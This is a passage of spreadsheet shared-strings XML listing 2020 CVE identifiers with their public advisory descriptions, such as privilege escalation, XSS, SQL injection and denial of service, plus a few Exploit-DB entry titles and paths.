    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334.</t>
  </si>
  <si>
    <t>CVE-2020-1307</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-1308</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1053.</t>
  </si>
  <si>
    <t>CVE-2020-1309</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1222.</t>
  </si>
  <si>
    <t>CVE-2020-13091</t>
  </si>
  <si>
    <t>** DISPUTED ** pandas through 1.0.3 can unserialize and execute commands from an untrusted file that is passed to the read_pickle() function, if __reduce__ makes an os.system call. NOTE: third parties dispute this issue because the read_pickle() function is documented as unsafe and it is the user's responsibility to use the function in a secure manner.</t>
  </si>
  <si>
    <t>CVE-2020-13092</t>
  </si>
  <si>
    <t>** DISPUTED ** scikit-learn (aka sklearn) through 0.23.0 can unserialize and execute commands from an untrusted file that is passed to the joblib.load() function, if __reduce__ makes an os.system call. NOTE: third parties dispute this issue because the joblib.load() function is documented as unsafe and it is the user's responsibility to use the function in a secure manner.</t>
  </si>
  <si>
    <t>CVE-2020-13093</t>
  </si>
  <si>
    <t>iSpyConnect.com Agent DVR before 2.7.1.0 allows directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-13094</t>
  </si>
  <si>
    <t>Dolibarr before 11.0.4 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13095</t>
  </si>
  <si>
    <t>Little Snitch version 4.5.1 and older changed ownership of a directory path controlled by the user. This allowed the user to escalate to root by linking the path to a directory containing code executed by root.</t>
  </si>
  <si>
    <t>CVE-2020-1310</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253.</t>
  </si>
  <si>
    <t>CVE-2020-13100</t>
  </si>
  <si>
    <t>Arista’s CloudVision eXchange (CVX) server before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause a denial of service (crash and restart) in the ControllerOob agent via a malformed control-plane packet.</t>
  </si>
  <si>
    <t>CVE-2020-13101</t>
  </si>
  <si>
    <t>In OASIS Digital Signature Services (DSS) 1.0, an attacker can control the validation outcome (i.e., trigger either a valid or invalid outcome for a valid or invalid signature) via a crafted XML signature, when the InlineXML option is used. This defeats the expectation of non-repudiation.</t>
  </si>
  <si>
    <t>CVE-2020-13109</t>
  </si>
  <si>
    <t>Morita Shogi 64 through 2020-05-02 for Nintendo 64 devices allows remote attackers to execute arbitrary code via crafted packet data to the built-in modem because 0x800b3e94 (aka the IF subcommand to top-level command 7) has a stack-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-1311</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs, aka 'Component Object Model Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48474.txt</t>
  </si>
  <si>
    <t>Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-13110</t>
  </si>
  <si>
    <t>The kerberos package before 1.0.0 for Node.js allows arbitrary code execution and privilege escalation via injection of malicious DLLs through use of the kerberos_sspi LoadLibrary() method, because of a DLL path search.</t>
  </si>
  <si>
    <t>CVE-2020-13111</t>
  </si>
  <si>
    <t>NaviServer 4.99.4 to 4.99.19 allows denial of service due to the nsd/driver.c ChunkedDecode function not properly validating the length of a chunk. A remote attacker can craft a chunked-transfer request that will result in a negative value being passed to memmove via the size parameter, causing the process to crash.</t>
  </si>
  <si>
    <t>CVE-2020-13112</t>
  </si>
  <si>
    <t>An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093.</t>
  </si>
  <si>
    <t>CVE-2020-13113</t>
  </si>
  <si>
    <t>An issue was discovered in libexif before 0.6.22. Use of uninitialized memory in EXIF Makernote handling could lead to crashes and potential use-after-free conditions.</t>
  </si>
  <si>
    <t>CVE-2020-13114</t>
  </si>
  <si>
    <t>An issue was discovered in libexif before 0.6.22. An unrestricted size in handling Canon EXIF MakerNote data could lead to consumption of large amounts of compute time for decoding EXIF data.</t>
  </si>
  <si>
    <t>CVE-2020-13116</t>
  </si>
  <si>
    <t>OpenText Carbonite Server Backup Portal before 8.8.7 allows XSS by an authenticated user via policy creation.</t>
  </si>
  <si>
    <t>CVE-2020-13117</t>
  </si>
  <si>
    <t>Wavlink WN575A4 and WN579X3 devices through 2020-05-15 allow unauthenticated remote users to inject commands via the key parameter in a login request.</t>
  </si>
  <si>
    <t>CVE-2020-13118</t>
  </si>
  <si>
    <t>An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community.</t>
  </si>
  <si>
    <t>CVE-2020-13119</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to clickjacking.</t>
  </si>
  <si>
    <t>CVE-2020-1312</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations.To exploit the vulnerability, an attacker would require unprivileged execution on the victim system, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1272, CVE-2020-1277, CVE-2020-1302.</t>
  </si>
  <si>
    <t>CVE-2020-13121</t>
  </si>
  <si>
    <t>Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.</t>
  </si>
  <si>
    <t>CVE-2020-13122</t>
  </si>
  <si>
    <t>The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system.</t>
  </si>
  <si>
    <t>CVE-2020-13124</t>
  </si>
  <si>
    <t>SABnzbd 2.3.9 and 3.0.0Alpha2 has a command injection vulnerability in the web configuration interface that permits an authenticated user to execute arbitrary Python commands on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-13125</t>
  </si>
  <si>
    <t>An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.</t>
  </si>
  <si>
    <t>CVE-2020-13126</t>
  </si>
  <si>
    <t>An issue was discovered in the Elementor Pro plugin before 2.9.4 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13125. An attacker with the Subscriber role can upload arbitrary executable files to achieve remote code execution. NOTE: the free Elementor plugin is unaffected.</t>
  </si>
  <si>
    <t>CVE-2020-13127</t>
  </si>
  <si>
    <t>A SQL injection vulnerability at a tpf URI in Loway QueueMetrics before 19.04.1 allows remote authenticated attackers to execute arbitrary SQL commands via the TASKS_LIST__pt.querystring parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13128</t>
  </si>
  <si>
    <t>An issue was discovered in Manolo GWTUpload 1.0.3. server/UploadServlet.java (the servlet for handling file upload) accepts a delay parameter that causes a thread to sleep. It can be abused to cause all of a server's threads to sleep, leading to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13129</t>
  </si>
  <si>
    <t>An issue was discovered in the stashcat app through 3.9.1 for macOS, Windows, Android, iOS, and possibly other platforms. The GET method is used with client_key and device_id data in the query string, which allows attackers to obtain sensitive information by reading web-server logs.</t>
  </si>
  <si>
    <t>CVE-2020-1313</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations, aka 'Windows Update Orchestrator Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13131</t>
  </si>
  <si>
    <t>An issue was discovered in Yubico libykpiv before 2.1.0. lib/util.c in this library (which is included in yubico-piv-tool) does not properly check embedded length fields during device communication. A malicious PIV token can misreport the returned length fields during RSA key generation. This will cause stack memory to be copied into heap allocated memory that gets returned to the caller. The leaked memory could include PINs, passwords, key material, and other sensitive information depending on the integration. During further processing by the caller, this information could leak across trust boundaries. Note that RSA key generation is triggered by the host and cannot directly be triggered by the token.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-13132</t>
  </si>
  <si>
    <t>An issue was discovered in Yubico libykpiv before 2.1.0. An attacker can trigger an incorrect free() in the ykpiv_util_generate_key() function in lib/util.c through incorrect error handling code. This could be used to cause a denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-13133</t>
  </si>
  <si>
    <t>Tufin SecureChange prior to R19.3 HF3 and R20-1 HF1 are vulnerable to stored XSS. The successful exploitation requires admin privileges (for storing the XSS payload itself), and can exploit (be triggered by) unauthenticated users. All TOS versions with SecureChange deployments prior to R19.3 HF3 and R20-1 HF1 are affected. Vulnerabilities were fixed in R19.3 HF3 and R20-1 HF1</t>
  </si>
  <si>
    <t>CVE-2020-13134</t>
  </si>
  <si>
    <t>Tufin SecureChange prior to R19.3 HF3 and R20-1 HF1 are vulnerable to stored XSS. The successful exploitation requires admin privileges (for storing the XSS payload itself), and can exploit (be triggered by) admin users. All TOS versions with SecureChange deployments prior to R19.3 HF3 and R20-1 HF1 are affected. Vulnerabilities were fixed in R19.3 HF3 and R20-1 HF1.</t>
  </si>
  <si>
    <t>CVE-2020-13135</t>
  </si>
  <si>
    <t>D-Link DSP-W215 1.26b03 devices allow information disclosure by intercepting messages on the local network, as demonstrated by a Squid Proxy.</t>
  </si>
  <si>
    <t>CVE-2020-13136</t>
  </si>
  <si>
    <t>D-Link DSP-W215 1.26b03 devices send an obfuscated hash that can be retrieved and understood by a network sniffer.</t>
  </si>
  <si>
    <t>CVE-2020-1314</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients, aka 'Windows Text Service Framework Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48500.txt</t>
  </si>
  <si>
    <t>OpenEDX platform Ironwood 2.5 - Remote Code Execution</t>
  </si>
  <si>
    <t>2020-05-21</t>
  </si>
  <si>
    <t>CVE-2020-13143</t>
  </si>
  <si>
    <t>gadget_dev_desc_UDC_store in drivers/usb/gadget/configfs.c in the Linux kernel 3.16 through 5.6.13 relies on kstrdup without considering the possibility of an internal '\0' value, which allows attackers to trigger an out-of-bounds read, aka CID-15753588bcd4.</t>
  </si>
  <si>
    <t>CVE-2020-13144</t>
  </si>
  <si>
    <t>Studio in Open edX Ironwood 2.5, when CodeJail is not used, allows a user to go to the "Create New course&gt;New section&gt;New subsection&gt;New unit&gt;Add new component&gt;Problem button&gt;Advanced tab&gt;Custom Python evaluated code" screen, edit the problem, and execute Python code. This leads to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-13145</t>
  </si>
  <si>
    <t>Studio in Open edX Ironwood 2.5 allows users to upload SVG files via the "Content&gt;File Uploads" screen. These files can contain JavaScript code and thus lead to Stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13146</t>
  </si>
  <si>
    <t>Studio in Open edX Ironwood 2.5 allows CSV injection because an added cohort in Course&gt;Instructor&gt;Cohorts may contain a formula that is exported via the "Course&gt;Data Downloads&gt;Reports&gt;Download profile info" feature.</t>
  </si>
  <si>
    <t>CVE-2020-13149</t>
  </si>
  <si>
    <t>Weak permissions on the "%PROGRAMDATA%\MSI\Dragon Center" folder in Dragon Center before 2.6.2003.2401, shipped with Micro-Star MSI Gaming laptops, allows local authenticated users to overwrite system files and gain escalated privileges. One attack method is to change the Recommended App binary within App.json. Another attack method is to use this part of %PROGRAMDATA% for mounting an RPC Control directory.</t>
  </si>
  <si>
    <t>CVE-2020-1315</t>
  </si>
  <si>
    <t>exploits/windows/local/48993.pl</t>
  </si>
  <si>
    <t>Amarok 2.8.0 - Denial-of-Service</t>
  </si>
  <si>
    <t>2020-11-05</t>
  </si>
  <si>
    <t>CVE-2020-13150</t>
  </si>
  <si>
    <t>D-link DSL-2750U ISL2750UEME3.V1E devices allow approximately 90 seconds of access to the control panel, after a restart, before MAC address filtering rules become active.</t>
  </si>
  <si>
    <t>CVE-2020-13151</t>
  </si>
  <si>
    <t>Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service.</t>
  </si>
  <si>
    <t>CVE-2020-13152</t>
  </si>
  <si>
    <t>A remote user can create a specially crafted M3U file, media playlist file that when loaded by the target user, will trigger a memory leak, whereby Amarok 2.8.0 continue to waste resources over time, eventually allows attackers to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13153</t>
  </si>
  <si>
    <t>app/View/Events/resolved_attributes.ctp in MISP before 2.4.126 has XSS in the resolved attributes view.</t>
  </si>
  <si>
    <t>CVE-2020-13154</t>
  </si>
  <si>
    <t>Zoho ManageEngine Service Plus before 11.1 build 11112 allows low-privilege authenticated users to discover the File Protection password via a getFileProtectionSettings call to AjaxServlet.</t>
  </si>
  <si>
    <t>CVE-2020-13155</t>
  </si>
  <si>
    <t>clearsystem.php in NukeViet 4.4 allows CSRF with resultant HTML injection via the deltype parameter to the admin/index.php?nv=webtools&amp;op=clearsystem URI.</t>
  </si>
  <si>
    <t>CVE-2020-13156</t>
  </si>
  <si>
    <t>modules\users\admin\add_user.php in NukeViet 4.4 allows CSRF to add a user account via the admin/index.php?nv=users&amp;op=user_add URI.</t>
  </si>
  <si>
    <t>CVE-2020-13157</t>
  </si>
  <si>
    <t>modules\users\admin\edit.php in NukeViet 4.4 allows CSRF to change a user's password via an admin/index.php?nv=users&amp;op=edit&amp;userid= URI. The old password is not needed.</t>
  </si>
  <si>
    <t>CVE-2020-13158</t>
  </si>
  <si>
    <t>Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13159</t>
  </si>
  <si>
    <t>Artica Proxy before 4.30.000000 Community Edition allows OS command injection via the Netbios name, Server domain name, dhclient_mac, Hostname, or Alias field. NOTE: this may overlap CVE-2020-10818.</t>
  </si>
  <si>
    <t>CVE-2020-1316</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307.</t>
  </si>
  <si>
    <t>exploits/windows/remote/48513.rb</t>
  </si>
  <si>
    <t>Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)</t>
  </si>
  <si>
    <t>2020-05-25</t>
  </si>
  <si>
    <t>CVE-2020-13160</t>
  </si>
  <si>
    <t>AnyDesk before 5.5.3 on Linux and FreeBSD has a format string vulnerability that can be exploited for remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-13162</t>
  </si>
  <si>
    <t>A time-of-check time-of-use vulnerability in PulseSecureService.exe in Pulse Secure Client versions prior to 9.1.6 down to 5.3 R70 for Windows (which runs as NT AUTHORITY/SYSTEM) allows unprivileged users to run a Microsoft Installer executable with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-13163</t>
  </si>
  <si>
    <t>em-imap 0.5 uses the library eventmachine in an insecure way that allows an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.</t>
  </si>
  <si>
    <t>CVE-2020-13164</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.3, 3.0.0 to 3.0.10, and 2.6.0 to 2.6.16, the NFS dissector could crash. This was addressed in epan/dissectors/packet-nfs.c by preventing excessive recursion, such as for a cycle in the directory graph on a filesystem.</t>
  </si>
  <si>
    <t>CVE-2020-13166</t>
  </si>
  <si>
    <t>The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.</t>
  </si>
  <si>
    <t>CVE-2020-13167</t>
  </si>
  <si>
    <t>Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.</t>
  </si>
  <si>
    <t>CVE-2020-13168</t>
  </si>
  <si>
    <t>SysAid 20.1.11b26 allows reflected XSS via the ForgotPassword.jsp accountid parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13169</t>
  </si>
  <si>
    <t>Stored XSS (Cross-Site Scripting) exists in the SolarWinds Orion Platform before before 2020.2.1 on multiple forms and pages. This vulnerability may lead to the Information Disclosure and Escalation of Privileges (takeover of administrator account).</t>
  </si>
  <si>
    <t>CVE-2020-1317</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka 'Group Policy Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13170</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise did not appropriately enforce scope for local tokens issued by a primary data center, where replication to a secondary data center was not enabled. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-13173</t>
  </si>
  <si>
    <t>Initialization of the pcoip_credential_provider in Teradici PCoIP Standard Agent for Windows and PCoIP Graphics Agent for Windows versions 19.11.1 and earlier creates an insecure named pipe, which allows an attacker to intercept sensitive information or possibly elevate privileges via pre-installing an application which acquires that named pipe.</t>
  </si>
  <si>
    <t>CVE-2020-13174</t>
  </si>
  <si>
    <t>The web server in the Teradici Managament console versions 20.04 and 20.01.1 did not properly set the X-Frame-Options HTTP header, which could allow an attacker to trick a user into clicking a malicious link via clickjacking.</t>
  </si>
  <si>
    <t>CVE-2020-13175</t>
  </si>
  <si>
    <t>The Management Interface of the Teradici Cloud Access Connector and Cloud Access Connector Legacy for releases prior to April 20, 2020 (v15 and earlier for Cloud Access Connector) contains a local file inclusion vulnerability which allows an unauthenticated remote attacker to leak LDAP credentials via a specially crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2020-13176</t>
  </si>
  <si>
    <t>The Management Interface of the Teradici Cloud Access Connector and Cloud Access Connector Legacy for releases prior to April 24, 2020 (v16 and earlier for the Cloud Access Connector) contains a stored cross-site scripting (XSS) vulnerability which allows a remote unauthenticated attacker to poison log files with malicious JavaScript via the login page which is executed when an administrator views the logs within the application.</t>
  </si>
  <si>
    <t>CVE-2020-13177</t>
  </si>
  <si>
    <t>The support bundler in Teradici PCoIP Standard Agent for Windows and Graphics Agent for Windows versions prior to 20.04.1 and 20.07.0 does not use hard coded paths for certain Windows binaries, which allows an attacker to gain elevated privileges via execution of a malicious binary placed in the system path.</t>
  </si>
  <si>
    <t>CVE-2020-13178</t>
  </si>
  <si>
    <t>A function in the Teradici PCoIP Standard Agent for Windows and Graphics Agent for Windows prior to version 20.04.1 does not properly validate the signature of an external binary, which could allow an attacker to gain elevated privileges via execution in the context of the PCoIP Agent process.</t>
  </si>
  <si>
    <t>CVE-2020-13179</t>
  </si>
  <si>
    <t>Broker Protocol messages in Teradici PCoIP Standard Agent for Windows and Graphics Agent for Windows prior to 20.04.1 are not cleaned up in server memory, which may allow an attacker to read confidential information from a memory dump via forcing a crashing during the single sign-on procedure.</t>
  </si>
  <si>
    <t>CVE-2020-1318</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1177, CVE-2020-1183, CVE-2020-1297, CVE-2020-1298, CVE-2020-1320.</t>
  </si>
  <si>
    <t>CVE-2020-13183</t>
  </si>
  <si>
    <t>Reflected Cross Site Scripting in Teradici PCoIP Management Console prior to 20.07 could allow an attacker to take over the user's active session if the user is exposed to a malicious payload.</t>
  </si>
  <si>
    <t>CVE-2020-13185</t>
  </si>
  <si>
    <t>Certain web application pages in the authenticated section of the Teradici Cloud Access Connector prior to v18 were accessible without the need to specify authentication tokens, which allowed an attacker in the ability to execute sensitive functions without credentials.</t>
  </si>
  <si>
    <t>CVE-2020-13186</t>
  </si>
  <si>
    <t>An Anti CSRF mechanism was discovered missing in the Teradici Cloud Access Connector v31 and earlier in a specific web form, which allowed an attacker with knowledge of both a machineID and user GUID to modify data if a user clicked a malicious link.</t>
  </si>
  <si>
    <t>CVE-2020-1319</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1129.</t>
  </si>
  <si>
    <t>CVE-2020-1320</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1177, CVE-2020-1183, CVE-2020-1297, CVE-2020-1298, CVE-2020-1318.</t>
  </si>
  <si>
    <t>CVE-2020-1321</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory, aka 'Microsoft Office Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1322</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Project reads out of bound memory due to an uninitialized variable, aka 'Microsoft Project Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48582.txt</t>
  </si>
  <si>
    <t>Sysax MultiServer 6.90 - Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-13223</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise logged proxy environment variables that potentially included sensitive credentials. Fixed in 1.3.6 and 1.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-13224</t>
  </si>
  <si>
    <t>TP-LINK NC200 devices through 2.1.10 build 200401, NC210 devices through 1.0.10 build 200401, NC220 devices through 1.3.1 build 200401, NC230 devices through 1.3.1 build 200401, NC250 devices through 1.3.1 build 200401, NC260 devices through 1.5.3 build_200401, and NC450 devices through 1.5.4 build 200401 have a Buffer Overflow</t>
  </si>
  <si>
    <t>CVE-2020-13225</t>
  </si>
  <si>
    <t>phpIPAM 1.4 contains a stored cross site scripting (XSS) vulnerability within the Edit User Instructions field of the User Instructions widget.</t>
  </si>
  <si>
    <t>CVE-2020-13226</t>
  </si>
  <si>
    <t>WSO2 API Manager 3.0.0 does not properly restrict outbound network access from a Publisher node, opening up the possibility of SSRF to this node's entire intranet.</t>
  </si>
  <si>
    <t>CVE-2020-13227</t>
  </si>
  <si>
    <t>An issue was discovered in Sysax Multi Server 6.90. An attacker can determine the username (under which the web server is running) by triggering an invalid path permission error. This bypasses the fakepath protection mechanism.</t>
  </si>
  <si>
    <t>CVE-2020-13228</t>
  </si>
  <si>
    <t>An issue was discovered in Sysax Multi Server 6.90. There is reflected XSS via the /scgi sid parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13229</t>
  </si>
  <si>
    <t>An issue was discovered in Sysax Multi Server 6.90. A session can be hijacked if one observes the sid value in any /scgi URI, because it is an authentication token.</t>
  </si>
  <si>
    <t>CVE-2020-1323</t>
  </si>
  <si>
    <t>An open redirect vulnerability exists in Microsoft SharePoint that could lead to spoofing.To exploit the vulnerability, an attacker could send a link that has a specially crafted URL and convince the user to click the link, aka 'SharePoint Open Redirect Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13230</t>
  </si>
  <si>
    <t>In Cacti before 1.2.11, disabling a user account does not immediately invalidate any permissions granted to that account (e.g., permission to view logs).</t>
  </si>
  <si>
    <t>CVE-2020-13231</t>
  </si>
  <si>
    <t>In Cacti before 1.2.11, auth_profile.php?action=edit allows CSRF for an admin email change.</t>
  </si>
  <si>
    <t>CVE-2020-13238</t>
  </si>
  <si>
    <t>Mitsubishi MELSEC iQ-R Series PLCs with firmware 33 allow attackers to halt the industrial process by sending an unauthenticated crafted packet over the network, because this denial of service attack consumes excessive CPU time. After halting, physical access to the PLC is required in order to restore production.</t>
  </si>
  <si>
    <t>CVE-2020-13239</t>
  </si>
  <si>
    <t>The DMS/ECM module in Dolibarr 11.0.4 renders user-uploaded .html files in the browser when the attachment parameter is removed from the direct download link. This causes XSS.</t>
  </si>
  <si>
    <t>CVE-2020-1324</t>
  </si>
  <si>
    <t>An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1162.</t>
  </si>
  <si>
    <t>CVE-2020-13240</t>
  </si>
  <si>
    <t>The DMS/ECM module in Dolibarr 11.0.4 allows users with the 'Setup documents directories' permission to rename uploaded files to have insecure file extensions. This bypasses the .noexe protection mechanism against XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13241</t>
  </si>
  <si>
    <t>Microweber 1.1.18 allows Unrestricted File Upload because admin/view:modules/load_module:users#edit-user=1 does not verify that the file extension (used with the Add Image option on the Edit User screen) corresponds to an image file.</t>
  </si>
  <si>
    <t>CVE-2020-13245</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by Missing SSL Certificate Validation. This affects R7000 1.0.9.6_1.2.19 through 1.0.11.100_10.2.10, and possibly R6120, R7800, R6220, R8000, R6350, R9000, R6400, RAX120, R6400v2, RBR20, R6800, XR300, R6850, XR500, and R7000P.</t>
  </si>
  <si>
    <t>CVE-2020-13246</t>
  </si>
  <si>
    <t>An issue was discovered in Gitea through 1.11.5. An attacker can trigger a deadlock by initiating a transfer of a repository's ownership from one organization to another.</t>
  </si>
  <si>
    <t>CVE-2020-13247</t>
  </si>
  <si>
    <t>BooleBox Secure File Sharing Utility before 4.2.3.0 allows CSV injection via a crafted user name that is mishandled during export from the activity logs in the Audit Area.</t>
  </si>
  <si>
    <t>CVE-2020-13248</t>
  </si>
  <si>
    <t>BooleBox Secure File Sharing Utility before 4.2.3.0 allows stored XSS via a crafted avatar field within My Account JSON data to Account.aspx.</t>
  </si>
  <si>
    <t>CVE-2020-13249</t>
  </si>
  <si>
    <t>libmariadb/mariadb_lib.c in MariaDB Connector/C before 3.1.8 does not properly validate the content of an OK packet received from a server. NOTE: although mariadb_lib.c was originally based on code shipped for MySQL, this issue does not affect any MySQL components supported by Oracle.</t>
  </si>
  <si>
    <t>CVE-2020-1325</t>
  </si>
  <si>
    <t>Azure DevOps Server and Team Foundation Services Spoofing Vulnerability</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48809.txt</t>
  </si>
  <si>
    <t>RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)</t>
  </si>
  <si>
    <t>2020-09-14</t>
  </si>
  <si>
    <t>CVE-2020-13250</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service. Fixed in 1.6.6 and 1.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-13252</t>
  </si>
  <si>
    <t>Centreon before 19.04.15 allows remote attackers to execute arbitrary OS commands by placing shell metacharacters in RRDdatabase_status_path (via a main.get.php request) and then visiting the include/views/graphs/graphStatus/displayServiceStatus.php page.</t>
  </si>
  <si>
    <t>CVE-2020-13253</t>
  </si>
  <si>
    <t>sd_wp_addr in hw/sd/sd.c in QEMU 4.2.0 uses an unvalidated address, which leads to an out-of-bounds read during sdhci_write() operations. A guest OS user can crash the QEMU process.</t>
  </si>
  <si>
    <t>CVE-2020-13254</t>
  </si>
  <si>
    <t>An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.</t>
  </si>
  <si>
    <t>CVE-2020-13258</t>
  </si>
  <si>
    <t>Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py.</t>
  </si>
  <si>
    <t>CVE-2020-13259</t>
  </si>
  <si>
